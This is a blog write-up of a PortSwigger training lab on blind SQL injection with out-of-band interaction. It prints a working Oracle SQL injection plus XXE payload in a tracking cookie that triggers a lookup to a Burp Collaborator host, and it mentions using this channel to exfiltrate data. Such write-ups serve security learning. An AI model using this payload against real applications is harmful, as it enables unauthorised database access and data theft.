ScrollUnlock

Lab 15 : Lab: Blind SQL injection with out-of-band interaction

Problem Statement :

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

Understanding –

You can trigger an out-of-band network interaction, using OAST techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly exfiltrate data via the out-of-band channel, for example by placing the data into a DNS lookup for a domain that you control.

https://portswigger.net/burp/application-security-testing/oast

‘+UNION+SELECT+EXTRACTVALUE(xmltype(‘<%3fxml+version%3d”1.0″+encoding%3d”UTF-8″%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+”http%3a//

cgwihkkm49dt3sgk9lufyyb6mxsngc.burpcollaborator.net/”>+%25remote%3b]>’),’/l’)+FROM+dual–

Solution –

  1. Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.
  2. Modify the TrackingId cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, you can combine SQL injection with basic XXE techniques as follows:
    TrackingId=x’+UNION+SELECT+EXTRACTVALUE(xmltype(‘<%3fxml+version%3d”1.0″+encoding%3d”UTF-8″%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+”http%3a//BURP-COLLABORATOR-SUBDOMAIN/”>+%25remote%3b]>’),’/l’)+FROM+dual–
  3. Right-click and select “Insert Collaborator payload” to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie.

The solution described here is sufficient simply to trigger a DNS lookup and so solve the lab. In a real-world situation, you would use Burp Collaborator client to verify that your payload had indeed triggered a DNS lookup and potentially exploit this behavior to exfiltrate sensitive data from the application. We’ll go over this technique in the next lab.

Response

  1. Solving SQL Injection Lab’s from PortSwigger | Scroll Unlock Avatar
    Solving SQL Injection Lab’s from PortSwigger | Scroll Unlock

    […] Lab 15 : Lab: Blind SQL injection with out-of-band interaction […]

    Liked by 1 person

    Reply

Leave a reply to Solving SQL Injection Lab’s from PortSwigger | Scroll Unlock Cancel reply

From the blog

About the author

Sophia Bennett is an art historian and freelance writer with a passion for exploring the intersections between nature, symbolism, and artistic expression. With a background in Renaissance and modern art, Sophia enjoys uncovering the hidden meanings behind iconic works and sharing her insights with art lovers of all levels. When she’s not visiting museums or researching the latest trends in contemporary art, you can find her hiking in the countryside, always chasing the next rainbow.